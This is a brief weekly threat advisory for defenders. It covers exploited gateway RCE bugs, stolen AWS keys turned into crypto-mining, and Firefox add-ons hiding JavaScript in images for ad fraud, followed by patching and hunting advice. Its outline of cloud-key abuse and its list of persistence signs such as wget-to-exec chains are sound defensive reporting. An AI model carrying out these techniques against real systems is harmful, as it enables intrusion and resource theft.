Edge-to-Cloud Threat Convergence: Perimeter RCE, Cloud Key Abuse, and Stego-Powered Browser Malware

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Gateways Under Fire: Edge & VPN RCE is the New Front Door

Attackers are zeroing in on internet-facing gateways for instant footholds and deep persistence, chaining device bugs into lateral movement and stealth C2.

• React2Shell (CVE-2025-55182) — Critical RCE actively exploited to drop advanced Linux implants (KSwapDoor, ZnDoor) and China-nexus payloads (MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, Noodle RAT). Post-ex pivots include reverse shells, MeshAgent, SSH key abuse, and ShadowPad/XMRig.

• WatchGuard Fireware IKEv2 (CVE-2025-14733) — Out-of-bounds write in iked enables unauthenticated RCE on Firebox with IKEv2 configs. Exploitation observed; crashes/hangs and abnormal CERT payloads in logs are key tells.

2. Cloud Abuse at Scale: IAM Keys → Instant Crypto Mines

With stolen AWS IAM creds, adversaries validate permissions via DryRun, then auto-deploy ECS/EC2/Lambda miners, crank autoscaling, and flip disableApiTermination to slow your response—often branching into SES-based phishing.

3. Your Browser, Their Revenue Stream: Extension Steg & Ad Fraud

GhostPoster hid JavaScript in PNG logos across 17 Firefox add-ons, delaying and randomizing activation to evade sandboxes. Once live, it hijacks affiliate links, injects tracking, strips CSP/X-Frame-Options, and abuses hidden iframes for ad/click fraud via coordinated C2.

Proactive Steps for the Week

• Patch & lock down edges: Update React2Shell-affected stacks and WatchGuard Fireware; restrict/disable IKEv2 and public management until patched.

• Hunt for persistence: Look for daemon masquerade on Linux, SOCKS5/port-forwards, new authorized_keys, root login enablement, and scripted wget→exec chains.

• Clamp cloud blast radius: Rotate/kill long-lived AWS keys, enforce MFA/least-privilege, alert on sudden ECS cluster creation, extreme autoscaling, and any disableApiTermination changes.

• Protect secrets: Block container/host access to cloud metadata where possible; monitor for TruffleHog/Gitleaks and unexpected az/azd token minting.

• Clean the browser edge: Remove risky Firefox add-ons; enforce an extension allow-list and monitor egress to low-reputation domains tied to the campaign.